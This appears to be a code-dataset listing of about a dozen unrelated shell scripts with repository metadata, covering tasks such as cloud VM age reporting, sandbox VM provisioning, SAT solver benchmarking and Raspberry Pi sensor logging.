if type indent > /dev/null 2>&1; then
    : ${GENCL_INDENT="indent -br"}
else
    : ${GENCL_INDENT=cat}
fi
# We rely on gsub in awk, which exists in everything except classic
# old V7 awk (Solaris!). If we can find gawk or nawk, we prefer those.
# http://www.shelldorado.com/articles/awkcompat.html
for f in gawk nawk awk; do
    if type "$f" > /dev/null 2>&1; then
        : ${GENCL_AWK="$f"}
        break
    fi
done
case "${GENCL_AWK}" in
'') echo "$0: could not find awk!">&2; exit 1;;
esac
usage="Usage: $0 inputoclfilename outputfilename"
case $# in
2) ;;
*) echo "$usage" >&2; exit 1;;
esac
case "$1" in
''|-*) echo "Invalid or empty inputoclfilename: $1
$usage" >&2; exit 1;;
esac
set -e
# Preprocess the kernel, optionally re-indent it, then escape backslashes and
# double quotes and wrap every line in a C string literal named opencl_src.
${CC-cc} -xc -E -P -nostdinc -D__OPENCL_VERSION__=1 $CPPFLAGS "$1" |
${GENCL_INDENT} |
${GENCL_AWK} 'BEGIN {print "static const char *opencl_src = \"\\n\\"}
{gsub("\\", "\\\\", $0); gsub("\"", "\\\"", $0); print $0 "\\n\\"}
END {print "\";"}' > "$2"
| true
|
7416b57351e0758796e2e52364ae593b5a8545e9
|
Shell
|
PowerVS-Actions/powervs-vms-age
|
/age.sh
|
UTF-8
| 4,005
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
: '
Copyright (C) 2021 IBM Corporation
Rafael Sene <rpsene@br.ibm.com> - Initial implementation.
'
# Collects the age (in days) of every VM across all IBM Cloud PowerVS
# instances and appends the results to a dated CSV report.
# Trap ctrl-c and call ctrl_c()
trap ctrl_c INT
# SIGINT handler: print a farewell and terminate the script successfully.
function ctrl_c() {
    printf '%s\n' "Bye!"
    exit 0
}
# Verify connectivity and that every external tool this script needs is
# installed; exits non-zero on the first missing tool.
# (Bug fix: a bare 'exit' previously reported success even when a
# dependency was missing.)
function check_dependencies() {
    DEPENDENCIES=(ibmcloud curl sh wget jq)
    check_connectivity
    for i in "${DEPENDENCIES[@]}"
    do
        if ! command -v "$i" &> /dev/null; then
            echo "$i could not be found, exiting!"
            exit 1
        fi
    done
}
function check_connectivity() {
if ! curl --output /dev/null --silent --head --fail http://cloud.ibm.com; then
echo "ERROR: please, check your internet connection."
exit 1
fi
}
function authenticate() {
local APY_KEY="$1"
if [ -z "$APY_KEY" ]; then
echo "API KEY was not set."
exit
fi
ibmcloud update -f > /dev/null 2>&1
ibmcloud plugin update --all > /dev/null 2>&1
ibmcloud login --no-region --apikey "$APY_KEY" > /dev/null 2>&1
}
function get_all_crn(){
TODAY=$(date '+%Y%m%d')
rm -f /tmp/crns-"$TODAY"
ibmcloud pi service-list --json | jq -r '.[] | "\(.CRN),\(.Name)"' >> /tmp/crns-"$TODAY"
}
function set_powervs() {
local CRN="$1"
if [ -z "$CRN" ]; then
echo "CRN was not set."
exit
fi
ibmcloud pi st "$CRN" > /dev/null 2>&1
}
function vm_age() {
TODAY=$(date '+%Y%m%d')
rm -f /tmp/vms-"$TODAY"
PVS_NAME=$1
IBMCLOUD_ID=$2
IBMCLOUD_NAME=$3
PVS_ZONE=$4
ibmcloud pi ins --json | jq -r '.Payload.pvmInstances[] | "\(.pvmInstanceID),\(.serverName),\(.networks[].ip),\(.status),\(.sysType),\(.creationDate),\(.osType),\(.processors),\(.memory),\(.health.status)"' > /tmp/vms-"$TODAY"
while read -r line; do
VM_ID=$(echo "$line" | awk -F ',' '{print $1}')
VM_NAME=$(echo "$line" | awk -F ',' '{print $2}')
STATUS=$(echo "$line" | awk -F ',' '{print $4}')
SYSTYPE=$(echo "$line" | awk -F ',' '{print $5}')
VM_CREATION_DATE=$(echo "$line" | awk -F ',' '{print $6}')
Y=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $1}')
M=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $2}' | sed 's/^0*//')
D=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $3}' | awk -F 'T' '{print $1}' | sed 's/^0*//')
DIFF=$(python3 -c "from datetime import date as d; print(d.today() - d($Y, $M, $D))" | awk -F ',' '{print $1}')
OS=$(echo "$line" | awk -F ',' '{print $7}')
PROCESSOR=$(echo "$line" | awk -F ',' '{print $8}')
MEMORY=$(echo "$line" | awk -F ',' '{print $9}')
HEALTH=$(echo "$line" | awk -F ',' '{print $10}')
DIFF=$(echo "$DIFF" | tr -d "days" | tr -d " ")
if [[ "$DIFF" == "0:00:00" ]]; then
DIFF="0"
fi
echo "$IBMCLOUD_ID,$IBMCLOUD_NAME,$PVS_NAME,$PVS_ZONE,$VM_ID,$VM_NAME,$DIFF,$OS,$PROCESSOR,$MEMORY,$SYSTYPE,$STATUS,$HEALTH" >> all_vms_"$TODAY".csv
done < /tmp/vms-"$TODAY"
}
function get_vms_per_crn(){
while read -r line; do
CRN=$(echo "$line" | awk -F ',' '{print $1}')
NAME=$(echo "$line" | awk -F ',' '{print $2}')
POWERVS_ZONE=$(echo "$line" | awk -F ':' '{print $6}')
set_powervs "$CRN"
vm_age "$NAME" "$1" "$2" "$POWERVS_ZONE"
done < /tmp/crns-"$TODAY"
}
function run (){
ACCOUNTS=()
while IFS= read -r line; do
clean_line=$(echo "$line" | tr -d '\r')
ACCOUNTS+=("$clean_line")
done < ./cloud_accounts
for i in "${ACCOUNTS[@]}"; do
IBMCLOUD=$(echo "$i" | awk -F "," '{print $1}')
IBMCLOUD_ID=$(echo "$IBMCLOUD" | awk -F ":" '{print $1}')
IBMCLOUD_NAME=$(echo "$IBMCLOUD" | awk -F ":" '{print $2}')
API_KEY=$(echo "$i" | awk -F "," '{print $2}')
if [ -z "$API_KEY" ]; then
echo
echo "ERROR: please, set your IBM Cloud API Key."
echo " e.g ./vms-age.sh API_KEY"
echo
exit 1
else
#API_KEY=$1
echo
check_dependencies
check_connectivity
authenticate "$API_KEY"
get_all_crn
get_vms_per_crn "$IBMCLOUD_ID" "$IBMCLOUD_NAME"
fi
done
awk 'NF' ./*.csv
}
run "$@"
| true
|
b886e0799d2e36ae5c9cef53cd86b7519a3c619c
|
Shell
|
MW-autocat-script/MW-autocat-script
|
/catscripts/Entertainment/Video_games/Video_game_consoles/Sony/PlayStation2.sh
|
UTF-8
| 375
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Auto-categorize new wiki pages that mention the Sony PlayStation 2.
# Pattern matching "PlayStation 2" / "PS2" with optional internal spaces.
KEYWORDS_PS2="Play(| )Station(| )2|\bPS(| )2\b"
# Exclude PS/2 computer-hardware hits (mouse/port/keyboard false positives).
KEYWORDS_PS2_EXCLUDE="PS(| )2(| )(mouse|port|keyboard)"
KEYWORDS_PS2_ALL="$KEYWORDS_PS2"
if [ "$1" == "" ]; #Normal operation
then
debug_start "PlayStation 2"
# NOTE(review): NEWPAGES, categorize, debug_start/debug_end are provided by
# the calling framework; they are not defined in this file.
PS2=$(egrep -i "$KEYWORDS_PS2" "$NEWPAGES" | egrep -iv "$KEYWORDS_PS2_EXCLUDE")
categorize "PS2" "PlayStation 2"
debug_end "PlayStation 2"
fi
| true
|
678e67ffc8910eb2fe762f4225b29204759201e2
|
Shell
|
private-octopus/ithitools
|
/src/oneMonthM3.sh
|
UTF-8
| 775
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Summarize one month of M3 capture files and compute the ITHI M3 metrics.
# Usage: oneMonthM3.sh <year> <month>
# (Fixed: the original first line was "# !/bin/bash", which is a plain
# comment, not a shebang, so the script ran under whatever shell invoked it.)
pwd
cd /home/ubuntu || exit 1
pwd
YEAR=$1
MM=$2
# First day of the requested month, normalized to YYYY-MM-DD.
FIRST_DAY=$(date -d "$YEAR-$MM-01" +%Y-%m-%d)
# YYYYMM selector used to match that month's data files by name.
DATE=$(date -d "$FIRST_DAY" +%Y%m)
# First day of the following month, then step back one day to get the last
# day of the requested month (handles 28/29/30/31-day months correctly).
DAY_AFTER_MONTH=$(date -d "$FIRST_DAY +1 months" +%Y-%m-01)
LAST_DAY=$(date -d "$DAY_AFTER_MONTH -1 day" +%Y-%m-%d)
echo "First day: $FIRST_DAY"
echo "Day after month: $DAY_AFTER_MONTH"
echo "This month selector: $DATE"
echo "Last day of this month: $LAST_DAY"
# Collect this month's CSV capture files into a list for ithitools.
find /home/rarends/data/"$DATE"* | grep ".csv" > m3_this_month.txt
# Redirecting wc's stdin avoids the file name leaking into the message.
echo "Found $(wc -l < m3_this_month.txt) files in /home/rarends/data/$DATE*"
M3F1=/home/ubuntu/ithi/input/M3/M3-$LAST_DAY-summary.csv
echo "Creating summary file in $M3F1"
./ithitools/ithitools -S m3_this_month.txt -o "$M3F1"
echo "Computing metrics for $LAST_DAY"
./ithitools/ithitools -i /home/ubuntu/ithi -d "$LAST_DAY" -m
| true
|
88b603b278fad32dde78de820b890fe0aaf821f3
|
Shell
|
phaer/kassomat-scripts
|
/install.sh
|
UTF-8
| 781
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the kassomat scripts: payout systemd unit, the kassomat user's
# xsession and openbox config, and /usr/local/bin symlinks for the helper
# executables listed below (linked under their extension-less names).
set -eu
dir=$(dirname "$(readlink -f "$0")")
executables=(changeomatic.sh kassomat-maintenance.sh payout-log-less.sh payout-restart.sh kassomat-set-coin-levels.py payout-log-tail.sh)
# "${executables[@]}" prints every entry; the original unquoted $executables
# expanded to the first element only.
echo "${executables[@]}"
echo "installing payout systemd unit file"
ln -svf "${dir}/payout.service" /etc/systemd/system/payout.service
echo "installing xession"
sudo -u kassomat ln -svf "${dir}/xsession" ~kassomat/.xsession
chmod +x ~kassomat/.xsession
echo "installing openbox configuration"
sudo -u kassomat mkdir -p ~kassomat/.config/openbox
sudo -u kassomat ln -svf "${dir}/openbox-rc.xml" ~kassomat/.config/openbox/rc.xml
for filename in "${executables[@]}"
do
    echo "$filename"
    # Command name without the .sh/.py extension.
    name="${filename%.*}"
    # Fixed: the link source was garbled ("$(unknown)"); link the script
    # itself into PATH under its extension-less name.
    ln -svf "${dir}/${filename}" "/usr/local/bin/${name}"
    chmod +x "/usr/local/bin/${name}"
done
| true
|
133e1a40b2dc4b5643c2b2d21805803fde3b8be5
|
Shell
|
MasuodSamarin/sd2iec_utils
|
/create_autoswap.sh
|
UTF-8
| 562
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# will search all sub folder in a given folder, and create an autoswap.lst file if more than one *.d64 is found
#
# usage:
#   create_autoswap.sh folder
#
if [ $# -lt 1 ]; then
    echo "usage: $0 folder" >&2
    exit 1
fi
IFS=$'\n\b' # take folders with ' ' as one entry
for DIR in $(find "$1" -type d)
do
    pushd "$DIR" >/dev/null || continue
    # count the disk images in this folder
    NUMBER_OF_D64=$(find *.d64 2>/dev/null | wc -l)
    # Fixed: [[ a > b ]] is a *string* comparison ("10" > "9" is false);
    # -gt compares numerically.
    if [[ $NUMBER_OF_D64 -gt 1 ]]; then
        echo "multiple d64 in folder $DIR, creating autoswap file"
        find *.d64 >autoswap.lst
    fi
    popd >/dev/null
done
| true
|
c89d3bd8326650cc9149482ff6ec1caa84c6eb89
|
Shell
|
mahmoodsheikh36/scripts
|
/view_audio_spectrum.sh
|
UTF-8
| 240
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# view_audio_spectrum.sh <audiofile>
# Render the audio spectrum of $1 with sox and display it with sxiv.
# (Fixed: added the missing shebang and quoted the temp path.)
# Random suffix keeps concurrent invocations from clobbering each other.
random_str=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13)
sox --multi-threaded "$1" -n spectrogram -o "/tmp/$random_str.png" && sxiv "/tmp/$random_str.png"
rm "/tmp/$random_str.png"
| true
|
7a3b671014467cd908c35c3bbc6695f05b424e27
|
Shell
|
akhalitov/sandbox_old
|
/sandbox-template-update
|
UTF-8
| 2,108
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# Provision a sandbox from a VM template: write the sandbox status file,
# wire the template's jumper and VE VMs into the sandbox VLAN, start them,
# and hand off to sandbox-template-init.
# Usage: sandbox-template-update <sandbox-number> <config-file>
set -x;
if [ $# -eq 0 ]; then
echo "No arguments"
exit 0
fi
# Zero-padded two-digit sandbox id, e.g. 7 -> "07".
SandboxID=`printf "%02d" $1`
CONFIG=$2
# The status file doubles as a lock: if it exists the sandbox is already set up.
if [ -e "/root/sandbox/status/$SandboxID" ];then
echo "sandbox status file /root/sandbox/status/$SandboxID exists"
exit 0
else
echo "status = NetworkSetting" >> /root/sandbox/status/$SandboxID
# Template name and domain come from "template ..." / "domain ..." lines
# in the config file.
TemplateName=`awk '/^template/{print $NF}' $CONFIG`
echo "template = $TemplateName" >> /root/sandbox/status/$SandboxID
Domain=`awk '/^domain/{print $NF}' $CONFIG`
echo "domain = $Domain" >> /root/sandbox/status/$SandboxID
# Pseudo-random 10-character password derived from the current time.
UserPassword=`date|md5sum |awk '{print substr($0,0,10)}'`
echo "password = $UserPassword" >> /root/sandbox/status/$SandboxID
# External IP assigned to this sandbox's VLAN, looked up in ip.cfg.
Sandbox_IP=`awk '/^sandbox-'$SandboxID'-VLAN/{print $NF}' /root/sandbox/config/ip.cfg`
echo "ip = $Sandbox_IP" >> /root/sandbox/status/$SandboxID
# Jumper VM: net0 gets the external IP, net1 joins the sandbox VLAN as gateway.
prlctl set Template_${TemplateName}_jumper --device-set net0 --ipadd ${Sandbox_IP}/24
prlctl set Template_${TemplateName}_jumper --device-set net1 --network sandbox-${SandboxID}-VLAN --ipadd 10.111.22.1
# ip-layout is "veid:lastoctet;veid:lastoctet;..."; attach each VE to the
# sandbox VLAN with its 10.111.22.x address.
IPLayout=`awk '/^ip-layout/{print $NF}' $CONFIG`
IFS=';' read -ra VE_LIST_WITH_IP <<< "$IPLayout"
for i in "${VE_LIST_WITH_IP[@]}"; do
IFS=':' read -ra VE <<< "$i"
prlctl set Template_${TemplateName}_ve${VE[0]} --device-set net0 --network sandbox-${SandboxID}-VLAN --ipadd 10.111.22.${VE[1]}
VE_LIST+=${VE[0]}
VE_LIST+=";"
done
echo "ve_list = $VE_LIST" >> /root/sandbox/status/$SandboxID
# Status transition: NetworkSetting -> starting.
sed -i 's/^\(status\s*=\s*\).*$/\1starting/' /root/sandbox/status/$SandboxID
prlctl start Template_${TemplateName}_jumper
# Re-read the VE list from the status file and start each VE.
VE_LIST=`awk '/^ve_list/{print $NF}' /root/sandbox/status/${SandboxID}`
for VE_ID in `echo $VE_LIST | sed 's/;/ /g'`; do
prlctl start Template_${TemplateName}_ve${VE_ID}
done
# Status transition: starting -> template_started, then finish initialization.
sed -i 's/^\(status\s*=\s*\).*$/\1template_started/' /root/sandbox/status/$SandboxID
sandbox-template-init $1
fi
set +x;
| true
|
feec8e6e2ead98c609f56c54efd40910c91e49ce
|
Shell
|
Timoniche/PDBAnalyzer
|
/simba_scripts/renaming_pdbs.sh
|
UTF-8
| 263
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Rename the SIMBA3D result PDB in each chromosome result directory to the
# canonical name Simba3d_chr<i>.pdb, for chromosomes 1..21.
root_path="/Users/ddulaev/Documents/BioInformatics/SIMBA3D"
for (( i = 1; i < 22; i++ ))
do
    dir_path_iter="${root_path}/examples/command_line_tutorial/results/chr${i}"
    # Skip chromosomes whose result directory does not exist (the original
    # unchecked cd would silently keep renaming in the previous directory).
    cd "${dir_path_iter}" || continue
    for file in *.pdb; do
        # With no match the glob stays as the literal string "*.pdb"; skip it.
        [ -e "$file" ] || continue
        mv -- "$file" "Simba3d_chr${i}.pdb"
    done
done
| true
|
41521746507b4fc5e7fa3d92b2ceb29c1267b315
|
Shell
|
ajrouvoet/symmetry
|
/collect.sh
|
UTF-8
| 1,943
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Run the minisat solver over a set of CNF benchmark suites, once per option
# set listed in OPTS, logging each run under data/<git-rev>/<options>/.
OUTDIR=./data/
# Current git revision; keys the output directory so runs are reproducible.
REF=`git rev-parse HEAD`
# Per-instance solver timeout, in seconds.
TIMEOUT_IN=900
OPTS="-no-inverting-opt -activity-look-freq=1"
# Alternative option sets kept for reference:
#-no-inverting-opt
#-no-inverting-opt -activity-nl-freq=1
#-no-inverting-opt -sym-var-bump
#-no-inverting-opt -sym-usage-var-bump"
echo "$OPTS" | while read opt
do
echo "-----------------------------------------------------------------------------------------"
echo ">> running with options: $opt"
echo "-----------------------------------------------------------------------------------------"
echo ""
# All .cnf instances in the listed suites, skipping the "Sym" variants.
find minisat/cnf\ test\ files/{fpga,battleship,chnl,Pigeonhole_shuffled,urquhart} -regex ".*\.cnf$" | grep -v "Sym" | while read f
do
# handle empty option sets
if `echo $opt | grep -q "^\s*$"`
then
opttext="vanilla"
else
opttext="$opt"
fi
# Turn the option string into a filesystem-safe directory name.
optpath=`echo $opttext | sed "s/\-\| \|:\|;/_/g"`
name=`basename "$f"`
suite=`basename "$(dirname $f)"`
outpath="$OUTDIR/$REF/$optpath/$suite/$name.log"
outdir=`dirname "$outpath"`
mkdir -p "$outdir"
echo ">> Running $name from suite $suite ("$f")"
echo ">> CMD: ./minisat/build/release/bin/minisat_core $opt ${f}"
# collect output
echo "Test: $name" > "${outpath}"
echo "Options: $opt" >> "${outpath}"
echo "$opt"
data="`timeout ${TIMEOUT_IN} ./minisat/build/release/bin/minisat_core $opt "$f"`"
# timeout(1) exits with status 124 when the time limit was reached.
if [ $? != 124 ]
then
echo "$data" >> "${outpath}"
else
echo "TIMEOUT" >> "${outpath}"
fi
echo ">> Done (output in: $outpath)"
echo ""
done
done
| true
|
b3306e575414a3bc2396504e8339770d548fac52
|
Shell
|
zubatyuk/lxc-viz-cluster
|
/setup-server-common
|
UTF-8
| 651
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Common server setup: apt proxy configuration, hourly apt-cache cleanup,
# unattended upgrades, and timezone.
#apt proxy
echo 'Acquire::http::proxy "http://aptproxy:3142";' > /etc/apt/apt.conf.d/02proxy
# Fixed: the https proxy host was "approxy" (typo) — use the same host as http.
echo 'Acquire::https::proxy "http://aptproxy:3142";' >> /etc/apt/apt.conf.d/02proxy
#clean apt cache since we use apt-proxy-ng
cat > /etc/cron.hourly/apt-clean << EOF
#!/bin/bash
apt-get clean
EOF
chmod +x /etc/cron.hourly/apt-clean
#upgrades
apt-get -y install unattended-upgrades
echo "APT::Periodic::Update-Package-Lists \"1\";" > /etc/apt/apt.conf.d/20auto-upgrades
echo "APT::Periodic::Unattended-Upgrade \"1\";" >> /etc/apt/apt.conf.d/20auto-upgrades
#timezone
echo 'US/Central' > /etc/timezone
dpkg-reconfigure -f noninteractive tzdata
| true
|
bf5ab3a7ef976c1c36a6123879b9871bd2a8d0bc
|
Shell
|
Findus23/Umweltdatenmessung
|
/main.sh
|
UTF-8
| 6,239
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Continuously read environmental sensors (temperatures, humidity, air
# pressure, air quality) on a Raspberry Pi, append each reading to a CSV
# file and publish the values for an LCD display and a web interface.
PFAD="/var/www/" # path to the web directory
r=0 # reset the backup counter to zero
IFS="; " # special variable - separators used to split air pressure and temperature readings
re='^[0-9]+$' # regular expression: is the variable a number?
pushbullet_api_key=$(cat /home/pi/Temperaturmessung/Fremddateien/pushbullet_settings.txt | head -n 1)
pushbullet_device=$(cat /home/pi/Temperaturmessung/Fremddateien/pushbullet_settings.txt | tail -n 1)
gpio mode 13 out # yellow
gpio mode 12 out # red
gpio mode 3 out # green
gpio write 13 0 # switch on green only
gpio write 12 0
gpio write 3 1
if [ $1 ] # if/case handling of the start parameters
then
case "$1" in
"-d")rm /home/pi/Temperaturmessung/dygraph.csv
;;
"-h") echo -e "-d csv-Datei leeren \nfür weitere Informationen siehe http://winkler.kremszeile.at/ oder https://github.com/Findus23/Umweltdatenmessung"
exit 1
;;
*) echo "unbekannter Parameter - Für Hilfe -h"
exit
;;
esac
fi
while true
do
uhrzeit=$(date +%Y/%m/%d\ %H:%M:%S) # e.g.: 2014/10/05 11:00:00 (for the csv file)
uhrzeit_display=$(date +%d.%m\ %H:%M:%S) # e.g.: 05.10 11:00:00 (for the display)
uhrzeit_lang=$(date +%d.%m.%y\ %H:%M:%S) # e.g.: 05.10.2014 11:00:00 (for the web interface)
rasp=$(/opt/vc/bin/vcgencmd measure_temp | cut -c 6,7,8,9) # measure the SoC operating temperature
temp1=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b53835/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) # indoor temperature
# Retry while the 1-wire sensor reports known error values (-1.250 / 85.000),
# flashing the yellow LED during retries.
# NOTE(review): the retry reads sensor 10-00080277abe1, not the sensor used
# for the first read (10-000802b53835); also "85.000" is checked twice —
# looks like copy/paste slips, confirm against the hardware.
while [ "$temp1" == "-1.250" ] || [ "$temp1" == "85.000" ] || [ "$temp1" == "85.000" ]
do
gpio write 13 1
echo "----Temp1: $temp1"
temp1=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277abe1/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
temp2=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) # device sensor 1
while [ "$temp2" == "-1.250" ] || [ "$temp2" == "85.000" ] || [ "$temp2" == "85.000" ]
do
gpio write 13 1
echo "----Temp2: $temp2"
temp2=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
temp3=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b4635f/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) # outdoor sensor
while [ "$temp3" == "-1.250" ] || [ "$temp3" == "85.000" ] || [ "$temp3" == "85.000" ]
do
gpio write 13 1
echo "----Temp3: $temp3"
temp3=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b4635f/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
# NOTE(review): temp4 reads the same sensor id as temp2 (10-00080277a5db),
# and the retry condition below tests "$temp3" instead of "$temp4" — both
# look like bugs; confirm the intended sensor id before changing.
temp4=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) # device sensor 2
while [ "$temp3" == "-1.250" ] || [ "$temp4" == "85.000" ] || [ "$temp4" == "85.000" ]
do
gpio write 13 1
echo "----Temp4: $temp4"
temp4=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
luft_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/AdafruitDHT.py 2302 17) # raw data of the humidity sensor
set -- $luft_roh # split using IFS (see top of file)
luft_temp=$1
luft_feucht=$2
# Retry while the reading is empty or the temperature is implausible (>40 or <-20).
while [ -z "$luft_roh" ] || [ "$(echo $luft_temp '>' 40 | bc -l)" -eq 1 ] || [ "$(echo $luft_temp '<' -20 | bc -l)" -eq 1 ]
do
gpio write 13 1
echo "----Luft: $luft_roh"
luft_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/AdafruitDHT.py 2302 17) # raw data of the humidity sensor
set -- $luft_roh
luft_temp=$1
luft_feucht=$2
gpio write 13 0
done
druck_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/Adafruit_BMP085_auswertung.py) # raw data of the air pressure sensor
set -- $druck_roh
temp_druck=$1
druck=$2
qualitat=$(sudo /home/pi/Temperaturmessung/Fremddateien/airsensor -v -o)
# Discard the air quality value when it is 0 or not a number.
if [ "$qualitat" = "0" ] || ! [[ $qualitat =~ $re ]]
then
qualitat=""
fi
ausgabe=${uhrzeit}\,${temp1}\,${temp2}\,${temp3}\,${temp4}\,${luft_temp}\,${luft_feucht}\,${druck}\,${temp_druck}\,${rasp},${qualitat}
echo $ausgabe >>/home/pi/Temperaturmessung/dygraph.csv
echo "$uhrzeit ${temp1},${temp2},${temp3},${temp4},${luft_temp},${luft_feucht},${druck},${temp_druck},${rasp},${qualitat}" # print the current reading in the terminal
# Trim the last two decimal places (rev|cut|rev) for the compact display/web output.
temp1_r=$(echo $temp1 |rev | cut -c 3- |rev)
temp2_r=$(echo $temp2 |rev | cut -c 3- |rev)
temp3_r=$(echo $temp3 |rev | cut -c 3- |rev)
temp4_r=$(echo $temp4 |rev | cut -c 3- |rev)
luft_temp_r=$(echo $luft_temp |rev | cut -c 3- |rev)
luft_feucht_r=$(echo $luft_feucht |rev | cut -c 3- |rev)
temp_druck_r=$(echo $temp_druck |rev | cut -c 2- |rev)
druck_r=$(echo $druck |rev | cut -c 2- |rev)
echo "$uhrzeit_display
$temp1_r
$temp2_r
$temp3_r
$temp4_r
$luft_temp_r
$luft_feucht_r
$temp_druck_r
$druck_r
$rasp
$qualitat" >/home/pi/Temperaturmessung/text.txt.temp # write to a temporary file first and then move it, to avoid a briefly empty file
echo "$uhrzeit_lang,${temp1_r},${temp2_r},${temp3_r},${temp4_r},${luft_temp_r},${luft_feucht_r},${temp_druck_r},${druck_r},${rasp},${qualitat}" >/home/pi/Temperaturmessung/text_ws.txt # data for the web page
/home/pi/Temperaturmessung/diverses/wunderground.py $temp1 $temp2 $temp3 $temp4 $luft_temp $luft_feucht $temp_druck $druck $rasp $qualitat >> /home/pi/wunderground.log &
sudo cp /home/pi/Temperaturmessung/text_ws.txt ${PFAD}text_ws.txt
mv /home/pi/Temperaturmessung/text.txt.temp /home/pi/Temperaturmessung/text.txt
sudo cp /home/pi/Temperaturmessung/dygraph.csv ${PFAD}dygraph.csv
sleep 8 # wait briefly
r=$(($r +1)) # count the number of iterations
if [ "$r" == "1000" ] # and create a backup every 1000 iterations
then
cp /home/pi/Temperaturmessung/dygraph.csv /home/pi/Temperaturmessung/dygraph.csv.bak
python /home/pi/Temperaturmessung/Fremddateien/send.py "l.winkler23@me.com" "Backup" "" "/home/pi/Temperaturmessung/dygraph.csv" &
/home/pi/Temperaturmessung/Fremddateien/pushbullet_cmd.py $pushbullet_api_key note $pushbullet_device "Backup erfolgreich" "$uhrzeit_display"
echo "Backup"
r=0
fi
done
| true
|
3a85516f5c56165df71b5314e82d7ffa85e92c68
|
Shell
|
josephthweatt/Fulton-Furnace-Hackathon
|
/interfaces/admin
|
UTF-8
| 1,226
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
# Admin menu: dispatches to the helper scripts that live next to this file
# (view_inventory, log_inventory, etc.) via a bash `select` loop.
#get the directory where the script was executed
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
clear
echo "Welcome back, admin: "
echo
PS3='What do you want to do? (Enter 6 for menu) '
options=("Log Inventory" "Log rate of consumption" "View VATS suggestions"
"View community alerts" "View Inventory" "Menu" "Quit")
# Keep showing the menu until "Quit" breaks out of the loop.
select opt in "${options[@]}"
do
case $opt in
"Log Inventory")
"$DIR"/view_inventory
"$DIR"/log_inventory
;;
"Log rate of consumption")
"$DIR"/view_inventory
"$DIR"/log_rate_of_consumption
;;
"View VATS suggestions")
# TODO: not implemented yet — placeholder output only.
echo "you chose choice 3"
;;
"View community alerts")
"$DIR"/admin_community_alerts
;;
"View Inventory")
"$DIR"/view_inventory
;;
"Menu")
echo "1) Log Inventory 5) View Inventory"
echo "2) Log rate of consumption 6) Menu"
echo "3) View VATS suggestions 7) Quit"
echo "4) View community alerts"
;;
"Quit")
break
;;
*) echo invalid option;;
esac
done
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.